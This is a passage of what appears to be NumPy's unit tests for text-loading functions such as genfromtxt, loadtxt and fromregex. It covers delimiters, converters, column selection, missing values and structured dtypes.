c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=6)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8], [2, 1, 4, 5]], int)
assert_array_equal(x, a)
class Testfromregex:
def test_record(self):
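# Test building a structured array from regex groups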
c = TextIO()
c.write('1.312 foo\n1.534 bar\n4.444 qux')
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = TextIO()
c.write('1312 foo\n1534 bar\n4444 qux')
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
@pytest.mark.parametrize("path_type", [str, Path])
def test_record_unicode(self, path_type):
utf8 = b'\xcf\x96'
with temppath() as str_path:
path = path_type(str_path)
with open(path, 'wb') as f:
f.write(b'1.312 foo' + utf8 + b' \n1.534 bar\n4.444 qux')
dt = [('num', np.float64), ('val', 'U4')]
x = np.fromregex(path, r"(?u)([0-9.]+)\s+(\w+)", dt, encoding='UTF-8')
a = np.array([(1.312, 'foo' + utf8.decode('UTF-8')), (1.534, 'bar'),
(4.444, 'qux')], dtype=dt)
assert_array_equal(x, a)
regexp = re.compile(r"([0-9.]+)\s+(\w+)", re.UNICODE)
x = np.fromregex(path, regexp, dt, encoding='UTF-8')
assert_array_equal(x, a)
def test_compiled_bytes(self):
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
dt = [('num', np.float64)]
a = np.array([1, 2, 3], dtype=dt)
x = np.fromregex(c, regexp, dt)
assert_array_equal(x, a)
def test_bad_dtype_not_structured(self):
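# Test that a non-structured dtype is rejected with a TypeError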
regexp = re.compile(b'(\\d)')
c = BytesIO(b'123')
with pytest.raises(TypeError, match='structured datatype'):
np.fromregex(c, regexp, dtype=np.float64)
#####--------------------------------------------------------------------------
class TestFromTxt(LoadTxtBase):
loadfunc = staticmethod(np.genfromtxt)
def test_record(self):
# Test w/ explicit dtype
data = TextIO('1 2\n3 4')
test = np.genfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = TextIO('M 64.0 75.0\nF 25.0 60.0')
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.genfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
# Test outputting a standard ndarray
data = TextIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
# Test squeezing to 1D
control = np.array([1, 2, 3, 4], int)
#
data = TextIO('1\n2\n3\n4\n')
test = np.genfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data = TextIO('1,2,3,4\n')
test = np.genfromtxt(data, dtype=int, delimiter=',')
assert_array_equal(test, control)
def test_comments(self):
# Test the stripping of comments
control = np.array([1, 2, 3, 5], int)
# Comment on its own line
data = TextIO('# comment\n1,2,3,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
# Comment at the end of a line
data = TextIO('1,2,3,5# comment\n')
test = np.genfromtxt(data, dtype=int, delimiter=',', comments='#')
assert_equal(test, control)
def test_skiprows(self):
# Test row skipping
control = np.array([1, 2, 3, 5], int)
kwargs = dict(dtype=int, delimiter=',')
#
data = TextIO('comment\n1,2,3,5\n')
test = np.genfromtxt(data, skip_header=1, **kwargs)
assert_equal(test, control)
#
data = TextIO('# comment\n1,2,3,5\n')
test = np.loadtxt(data, skiprows=1, **kwargs)
assert_equal(test, control)
def test_skip_footer(self):
data = ["# %i" % i for i in range(1, 6)]
data.append("A, B, C")
data.extend(["%i,%3.1f,%03s" % (i, i, i) for i in range(51)])
data[-1] = "99,99"
kwargs = dict(delimiter=",", names=True, skip_header=5, skip_footer=10)
test = np.genfromtxt(TextIO("\n".join(data)), **kwargs)
ctrl = np.array([("%f" % i, "%f" % i, "%f" % i) for i in range(41)],
dtype=[(_, float) for _ in "ABC"])
assert_equal(test, ctrl)
def test_skip_footer_with_invalid(self):
with suppress_warnings() as sup:
sup.filter(ConversionWarning)
basestr = '1 1\n2 2\n3 3\n4 4\n5 \n6 \n7 \n'
# Footer too small to get rid of all invalid values
assert_raises(ValueError, np.genfromtxt,
TextIO(basestr), skip_footer=1)
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
a = np.genfromtxt(TextIO(basestr), skip_footer=3)
assert_equal(a, np.array([[1., 1.], [2., 2.], [3., 3.], [4., 4.]]))
#
basestr = '1 1\n2 \n3 3\n4 4\n5 \n6 6\n7 7\n'
a = np.genfromtxt(
TextIO(basestr), skip_footer=1, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.], [6., 6.]]))
a = np.genfromtxt(
TextIO(basestr), skip_footer=3, invalid_raise=False)
assert_equal(a, np.array([[1., 1.], [3., 3.], [4., 4.]]))
def test_header(self):
# Test retrieving a header
data = TextIO('gender age weight\nM 64.0 75.0\nF 25.0 60.0')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None, names=True)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = {'gender': np.array([b'M', b'F']),
'age': np.array([64.0, 25.0]),
'weight': np.array([75.0, 60.0])}
assert_equal(test['gender'], control['gender'])
assert_equal(test['age'], control['age'])
assert_equal(test['weight'], control['weight'])
def test_auto_dtype(self):
# Test the automatic definition of the output dtype
data = TextIO('A 64 75.0 3+4j True\nBCD 25 60.0 5+6j False')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = [np.array([b'A', b'BCD']),
np.array([64, 25]),
np.array([75.0, 60.0]),
np.array([3 + 4j, 5 + 6j]),
np.array([True, False]), ]
assert_equal(test.dtype.names, ['f0', 'f1', 'f2', 'f3', 'f4'])
for (i, ctrl) in enumerate(control):
assert_equal(test['f%i' % i], ctrl)
def test_auto_dtype_uniform(self):
# Tests whether the output dtype can be uniformized
data = TextIO('1 2 3 4\n5 6 7 8\n')
test = np.genfromtxt(data, dtype=None)
control = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
assert_equal(test, control)
def test_fancy_dtype(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',')
control = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_names_overwrite(self):
# Test overwriting the names of the dtype
descriptor = {'names': ('g', 'a', 'w'),
'formats': ('S1', 'i4', 'f4')}
data = TextIO(b'M 64.0 75.0\nF 25.0 60.0')
names = ('gender', 'age', 'weight')
test = np.genfromtxt(data, dtype=descriptor, names=names)
descriptor['names'] = names
control = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=descriptor)
assert_equal(test, control)
def test_commented_header(self):
# Check that names can be retrieved even if the line is commented out.
data = TextIO("""
#gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
# The # is part of the first name and should be deleted automatically.
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('M', 21, 72.1), ('F', 35, 58.33), ('M', 33, 21.99)],
dtype=[('gender', '|S1'), ('age', int), ('weight', float)])
assert_equal(test, ctrl)
# Ditto, but we should get rid of the first element
data = TextIO(b"""
# gender age weight
M 21 72.100000
F 35 58.330000
M 33 21.99
""")
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
assert_equal(test, ctrl)
def test_names_and_comments_none(self):
# Tests the case where names is True but comments is None (gh-10780)
data = TextIO('col1 col2\n 1 2\n 3 4')
test = np.genfromtxt(data, dtype=(int, int), comments=None, names=True)
control = np.array([(1, 2), (3, 4)], dtype=[('col1', int), ('col2', int)])
assert_equal(test, control)
def test_file_is_closed_on_error(self):
# gh-13200
with tempdir() as tmpdir:
fpath = os.path.join(tmpdir, "test.csv")
with open(fpath, "wb") as f:
f.write(u'\N{GREEK PI SYMBOL}'.encode('utf8'))
# ResourceWarnings are emitted from a destructor, so won't be
# detected by regular propagation to errors.
with assert_no_warnings():
with pytest.raises(UnicodeDecodeError):
np.genfromtxt(fpath, encoding="ascii")
def test_autonames_and_usecols(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'),
names=True, dtype=None)
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 45, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_with_usecols(self):
# Test the combination user-defined converters and usecol
data = TextIO('1,2,3,,5\n6,7,8,9,10\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
control = np.array([[2, -999], [7, 9]], int)
assert_equal(test, control)
def test_converters_with_usecols_and_names(self):
# Tests names and usecols
data = TextIO('A B C D\n aaaa 121 45 9.1')
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
test = np.genfromtxt(data, usecols=('A', 'C', 'D'), names=True,
dtype=None,
converters={'C': lambda s: 2 * int(s)})
assert_(w[0].category is np.VisibleDeprecationWarning)
control = np.array(('aaaa', 90, 9.1),
dtype=[('A', '|S4'), ('C', int), ('D', float)])
assert_equal(test, control)
def test_converters_cornercases(self):
# Test the conversion to datetime.
converter = {
'date': lambda s: strptime(s, '%Y-%m-%d %H:%M:%SZ')}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', np.object_), ('stid', float)])
assert_equal(test, control)
def test_converters_cornercases2(self):
# Test the conversion to datetime64.
converter = {
'date': lambda s: np.datetime64(strptime(s, '%Y-%m-%d %H:%M:%SZ'))}
data = TextIO('2009-02-03 12:00:00Z, 72214.0')
test = np.genfromtxt(data, delimiter=',', dtype=None,
names=['date', 'stid'], converters=converter)
control = np.array((datetime(2009, 2, 3), 72214.),
dtype=[('date', 'datetime64[us]'), ('stid', float)])
assert_equal(test, control)
def test_unused_converter(self):
# Test whether unused converters are forgotten
data = TextIO("1 21\n 3 42\n")
test = np.genfromtxt(data, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_equal(test, [21, 42])
#
data.seek(0)
test = np.genfromtxt(data, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_equal(test, [33, 66])
def test_invalid_converter(self):
strip_rand = lambda x: float((b'r' in x.lower() and x.split()[-1]) or
(b'r' not in x.lower() and x.strip() or 0.0))
strip_per = lambda x: float((b'%' in x.lower() and x.split()[0]) or
(b'%' not in x.lower() and x.strip() or 0.0))
s = TextIO("D01N01,10/1/2003 ,1 %,R 75,400,600\r\n"
"L24U05,12/5/2003, 2 %,1,300, 150.5\r\n"
"D02N03,10/10/2004,R 1,,7,145.55")
kwargs = dict(
converters={2: strip_per, 3: strip_rand}, delimiter=",",
dtype=None)
assert_raises(ConverterError, np.genfromtxt, s, **kwargs)
def test_tricky_converter_bug1666(self):
# Test some corner cases
s = TextIO('q1,2\nq3,4')
cnv = lambda s: float(s[1:])
test = np.genfromtxt(s, delimiter=',', converters={0: cnv})
control = np.array([[1., 2.], [3., 4.]])
assert_equal(test, control)
def test_dtype_with_converters(self):
dstr = "2009; 23; 46"
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: bytes})
control = np.array([('2009', 23., 46)],
dtype=[('f0', '|S4'), ('f1', float), ('f2', float)])
assert_equal(test, control)
test = np.genfromtxt(TextIO(dstr,),
delimiter=";", dtype=float, converters={0: float})
control = np.array([2009., 23., 46],)
assert_equal(test, control)
def test_dtype_with_converters_and_usecols(self):
dstr = "1,5,-1,1:1\n2,8,-1,1:n\n3,3,-2,m:n\n"
dmap = {'1:1':0, '1:n':1, 'm:1':2, 'm:n':3}
dtyp = [('e1','i4'),('e2','i4'),('e3','i2'),('n', 'i1')]
conv = {0: int, 1: int, 2: int, 3: lambda r: dmap[r.decode()]}
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
names=None, converters=conv)
control = np.rec.array([(1,5,-1,0), (2,8,-1,1), (3,3,-2,3)], dtype=dtyp)
assert_equal(test, control)
dtyp = [('e1','i4'),('e2','i4'),('n', 'i1')]
test = np.recfromcsv(TextIO(dstr,), dtype=dtyp, delimiter=',',
usecols=(0,1,3), names=None, converters=conv)
control = np.rec.array([(1,5,0), (2,8,1), (3,3,3)], dtype=dtyp)
assert_equal(test, control)
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.genfromtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
ndtype = [('nest', [('idx', int), ('code', object)])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
# nested but empty fields also aren't supported
ndtype = [('idx', int), ('code', object), ('nest', [])]
with assert_raises_regex(NotImplementedError,
'Nested fields.* not supported.*'):
test = np.genfromtxt(TextIO(data), delimiter=";",
dtype=ndtype, converters=converters)
def test_dtype_with_object_no_converter(self):
# Object without a converter uses bytes:
parsed = np.genfromtxt(TextIO("1"), dtype=object)
assert parsed[()] == b"1"
parsed = np.genfromtxt(TextIO("string"), dtype=object)
assert parsed[()] == b"string"
def test_userconverters_with_explicit_dtype(self):
# Test user_converters w/ explicit (standard) dtype
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_utf8_userconverters_with_explicit_dtype(self):
utf8 = b'\xcf\x96'
with temppath() as path:
with open(path, 'wb') as f:
f.write(b'skip,skip,2001-01-01' + utf8 + b',1.0,skip')
test = np.genfromtxt(path, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: np.compat.unicode},
encoding='UTF-8')
control = np.array([('2001-01-01' + utf8.decode('UTF-8'), 1.)],
dtype=[('', '|U11'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
# Test space delimiter
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.genfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
# Test using an integer for delimiter
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.genfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
# Test w/ a delimiter tab
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
# Test the selection of columns
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.genfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
# Test giving usecols with a comma-separated string
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
# Test usecols with an explicit structured dtype
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.genfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
# Test usecols with an integer
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
# Test usecols with named columns
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
# Test that an empty file raises the proper warning.
with suppress_warnings() as sup:
sup.filter(message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
# when skip_header > 0
test = np.genfromtxt(data, skip_header=1)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
# Check that a nested dtype isn't MIA
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.genfromtxt(data, dtype=fancydtype, delimiter=',', usemask=True)
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.genfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.genfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.genfromtxt(data, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', float), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.genfromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, usemask=True, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.genfromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
usemask=True,
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
# Test with missing and filling values
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
data2 = "1,2,*,4\n5,*,7,8\n"
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=0)
ctrl = np.array([[1, 2, 0, 4], [5, 0, 7, 8]])
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data2), delimiter=',', dtype=int,
missing_values="*", filling_values=-1)
ctrl = np.array([[1, 2, -1, 4], [5, -1, 7, 8]])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.genfromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True, usemask=True)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', int), ('B', float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
# Test masked column
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
# Test masked column
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
# Test invalid raise
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True)
def f():
return np.genfromtxt(mdata, invalid_raise=False, **kwargs)
mtest = assert_warns(ConversionWarning, f)
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.genfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
# Test invalid_raise with usecols
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
def f():
return np.genfromtxt(mdata, usecols=(0, 4), **kwargs)
mtest = assert_warns(ConversionWarning, f)
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.genfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
# Test inconsistent dtype
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x.decode()}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
# Test default format
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
# Test single dtype w/o names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
# Test single dtype w explicit names
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
# Test single dtype w implicit names
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
# Test easy structured dtype
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.genfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
# Test autostrip
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
with warnings.catch_warnings(record=True) as w:
warnings.filterwarnings('always', '', np.VisibleDeprecationWarning)
mtest = np.genfromtxt(TextIO(data), autostrip=True, **kwargs)
assert_(w[0].category is np.VisibleDeprecationWarning)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
# Test the 'replace_space' option
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_replace_space_known_dtype(self):
# Test the 'replace_space' (and related) options when dtype != None
txt = "A.A, B (B), C:C\n1, 2, 3"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=int)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", int)]
